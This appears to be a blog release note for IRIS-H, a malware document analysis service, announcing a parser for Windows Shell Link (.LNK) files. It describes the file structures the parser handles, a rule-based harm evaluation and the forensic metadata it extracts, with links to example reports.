Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI
Short Description: Shell Link (.LNK) file format parser has been added to API component. Cosmetic changes to UI to align new data view with the existing format.
Outstanding Tasks: Implement support for missing Extra Data Blocks
Detailed Summary
New binary data parser has been added to IRIS-H service. It can handle processing and extracting digital artifacts from Shell Link (.LNK) files. The service now accepts LNK files through Submission page and can also automatically detect them embedded into submitted documents. In either case, the report page will display extracted binary data enriched with human readable description. The enrichment process references the official Microsoft specification for [MS-SHLLINK] Binary File Format.
The parser fully supports the following LNK file structures:
- ShellLinkHeader
- LinkTargetIDList
- LinkInfo
- StringData
ExtraData structure is partially supported at this time. Only the following Data Blocks will be processed:
- EnvironmentVariableDataBlock
- KnownFolderDataBlock
- SpecialFolderDataBlock
- TrackerDataBlock
- PropertyStoreDataBlock
Once all binary data is extracted, it'll be subject to a rule-based evaluation. The conclusion will be drawn if the submitted or embedded LNK file can be harmful. IRIS-H will attempt to reconstruct the command line including arguments if any. Below is an example of rule-based evaluation results.
LNK file rule-based evaluation results |
A few new sections have been added to "Informational Findings" panel. The sections display information relevant to the LNK file target; file path, working directory, relevant path, command-line arguments, etc. One particular section - "Link Target Tracking" will contain the evaluation results of the data stored in the following Data Blocks:
- Droid Volume Identifier
- Droid File Identifier
- Birth Droid Volume Identifier
- Birth Droid File Identifier
LNK file Informational Findings example |
"Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, TrackerDataBlock holds the Link Target originator machine's NetBIOS name and MAC address. See below for an example.
Data derived from TrackerDataBlock |
ShellLinkHeader section contains time stamps associated with Link Target, as well as, its file attributes, the type of the media it resides on(hard disk, USB, network, etc), media serial number and even command line window state. See below for an example.
Data derived from ShellLinkHeader |
In addition, IRIS-H will attempt to resolve "Known Folder" GUID and "Special Folder" ID and display their corresponding descriptions. See an example below.
Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock |
Examples of full reports can be found on the links below:
https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771 - submitted LNK file.
https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506 - embedded LNK file found in a Microsoft Office document.
No comments:
Post a Comment